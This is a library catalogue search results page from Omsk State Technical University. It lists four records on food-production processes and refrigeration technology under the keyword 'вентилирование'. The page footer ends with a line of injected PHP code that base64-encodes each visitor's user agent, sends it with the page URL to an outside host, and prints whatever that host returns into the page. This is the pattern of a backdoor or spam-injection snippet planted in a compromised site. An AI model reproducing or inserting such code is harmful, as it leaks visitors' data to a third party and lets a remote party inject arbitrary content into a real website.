Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

287 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ВЕНТИЛИРОВАНИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Плаксин, Юрий Михайлович. Процессы и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. бакалавров "Технология продуктов питания" и направлениям подгот. дипломир. специалистов "Производство продуктов питания из растительного сырья", "Технология продовольственных продуктов специального назначения и общественного питания", "Пищевая инженерия" / Ю. М. Плаксин, Н. Н. Малахов, В. А. Ларин, 2008. - 758, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ГИДРАВЛИКА -- ГИДРОСТАТИКА -- ГИДРОДИНАМИКА -- ИСТЕЧЕНИЕ -- ЖИДКОСТЬ -- ОТВЕРСТИЕ -- НАСАДКА -- ГИДРАВЛИЧЕСКИЙ -- УДАР -- ТРУБОПРОВОД -- АСПИРАЦИЯ -- ПНЕВМОТРАНСПОРТ -- ПОРШНЕВОЙ -- РОТОРНЫЙ -- ПЛУНЖЕРНЫЙ -- НАСОС -- ШЕСТЕРЕННЫЙ -- ПЛАСТИНЧАТЫЙ -- ЦЕНТРОБЕЖНЫЙ -- КОМПРЕССОР -- ВАКУУМНЫЙ -- ГИДРОЦИЛИНДР -- ГИДРОДВИГАТЕЛЬ -- ПЕРЕМЕШИВАНИЕ -- СМЕСИТЕЛЬ -- РАЗДЕЛЕНИЕ -- ОСАЖДЕНИЕ -- ЭЛЕКТРООСАЖДЕНИЕ -- СЕПАРАТОР -- ЦЕНТРИФУГА -- ЦИКЛОН -- ФИЛЬТРОВАНИЕ -- МЕМБРАНА -- ИЗМЕЛЬЧЕНИЕ -- НАГРЕВАНИЕ -- ОХЛАЖДЕНИЕ -- ТЕПЛООБМЕННИК -- ВЫПАРИВАНИЕ -- КОНДЕНСАЦИЯ -- ВЫПЕЧКА -- ХЛЕБ -- УТИЛИЗАЦИЯ -- ТЕПЛОТА -- ХОЛОДИЛЬНАЯ -- ПЕРЕГОНКА -- СУШКА -- ВЕНТИЛИРОВАНИЕ -- ЗЕРНО -- АБСОРБЦИЯ -- АДСОРБЦИЯ -- КРИСТАЛЛИЗАЦИЯ -- РАСТВОРЕНИЕ -- ЭКСТРАГИРОВАНИЕ -- ЭКСТРАКЦИЯ -- ФЕРМЕНТАЦИЯ -- ПАСТЕРИЗАЦИИ -- СТЕРИЛИЗАЦИЯ -- ДЕТОНАЦИЯ -- ПЫЛЬ -- РАСПЫЛИВАНИЕ -- ШЛИФОВАНИЕ -- СЕПАРИРОВАНИЕ
Держатели документа (Информация об экземплярах) 

Изложены методы исследования процессов пищевых производств. Даны необходимые сведения о гидравлических, гидромеханических, тепловых, массообменных, физико-химических и механических процессах. Рассмотрено оборудование, предназначенное для реализации основных процессов пищевых производств. Приведены методы его инженерного расчета.

Во втором издании описаны специальные гидравлические машины пищевых производств, компрессоры, вакуум-насосы, дан материал по холодильным процессам. Каждая глава дополнена четко сформулированными основными положениями, обобщающими изложенный материал, контрольными вопросами и заданиями, а также текстами для проверки знаний.

2. 
Холодильная техника и технология [Текст] : респ. межведомств. науч.-техн. сб. Вып. 46 / редкол.: И. Г. Чумак [и др.], 1988. - 104, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Холодильная техника и технология [Текст] : респ. межведомств. науч.-техн. сб. Сб. 19 / редкол.: С. Г. Чуклин [и др.], 1974. - 130, [1] с.
Ключевые слова 
СБОРНИК -- ТЕПЛООБМЕН -- ПРИБОР -- ОХЛАЖДЕНИЕ -- ПАНЕЛЬНЫЙ -- СИНТЕЗ -- АММИАК -- ВОЛНОВОЕ -- ТЕЧЕНИЕ -- ПЛЕНКА -- ВЯЗКАЯ -- ЖИДКОСТЬ -- КАСАТЕЛЬНОЕ -- НАПРЯЖЕНИЕ -- ВЕРТИКАЛЬНАЯ -- ПОВЕРХНОСТЬ -- ЗАПАЗДЫВАНИЕ -- ПОДАЧА -- ЖИДКИЙ -- АЗОТ -- ВОЗДУХООХЛАДИТЕЛЬ -- КИПЕНИЕ -- ФРЕОН -- АБСОРБЦИОННАЯ -- ДЕФЛЕГМАТОР -- РЕКТИФИКАТОР -- ВОДОАММИАЧНЫЙ -- ПАР -- ТУРБОКОМПРЕССОР -- КОНДИЦИОНИРОВАНИЕ -- ВОЗДУХ -- ПОЛУЧЕНИЕ -- ПРЕСНАЯ -- ВОДА -- ХОЛОД -- ТЕРМОЭЛЕКТРИЧЕСКИЙ -- КРИСТАЛЛИЗАТОР -- ПРОФИЛИРОВАННЫЙ -- ТЕРМОЭЛЕМЕНТ -- ВЯЗКОСТЬ -- ТЕПЛОПРОВОДНОСТЬ -- КОЭФФИЦИЕНТ -- ПОВЕРХНОСТНОЕ -- НАТЯЖЕНИЕ -- ИЗОТОП -- ГЕЛИЙ -- ВЕНТИЛИРОВАНИЕ -- ХРАНЕНИЕ -- КАРТОФЕЛЬ
Держатели документа (Информация об экземплярах) 
4. 
Холодильная техника и технология [Текст] : респ. межведомств. науч.-техн. сб. Сб. 8 / редкол.: С. Г. Чуклин [и др.], 1969. - 115, [1] с.
Ключевые слова 
СБОРНИК -- АГЕНТЫ -- ПРЯМОТОЧНЫЙ -- КОМПРЕССОР -- ОСЦИЛЛОГРАФИЧЕСКИЕ -- ИССЛЕДОВАНИЯ -- ГЕРМЕТИЧНЫЙ -- АБСОРБЦИОННАЯ -- ДЕФЛЕГМАТОР -- РАСТВОР -- ВОДОАММИАЧНЫЙ -- ТЕПЛОВОЙ -- НАСОС -- ВОЗДУШНАЯ -- КОНДИЦИОНИРОВАНИЕ -- ВОЗДУХ -- ФРЕОНОВЫЙ -- КАМЕРА -- ХРАНЕНИЯ -- КОНДЕНСАТОР -- АММИАЧНАЯ -- ГЕНЕРАТОР -- НАПРАВЛЕННЫЙ -- КРИСТАЛЛ -- РЕАЛЬНЫЙ -- ГАЗ -- УЛЬТРАЗВУК -- КРИПТОН -- ВЯЗКОСТЬ -- ЭНТРОПИЯ -- ГАЗООБРАЗНАЯ -- СМЕСЬ -- ХЛАДОАГЕНТ -- ТЕПЛООТДАЧА -- КИПЕНИЕ -- КОНДЕНСАЦИЯ -- РЕБРИСТАЯ -- ТРУБА -- ЭЛЕМЕНТ -- ГАЗОНАПОЛНЕННЫЕ -- ПЛАСТМАССА -- ОАР -- СТУПЕНЧАТОЕ -- ОХЛАЖДЕНИЕ -- ВЛАГООБМЕН -- ВЕНТИЛИРОВАНИЕ -- СВЕКЛА -- МЫТАЯ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.82 с.12 запросов, 1.86c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;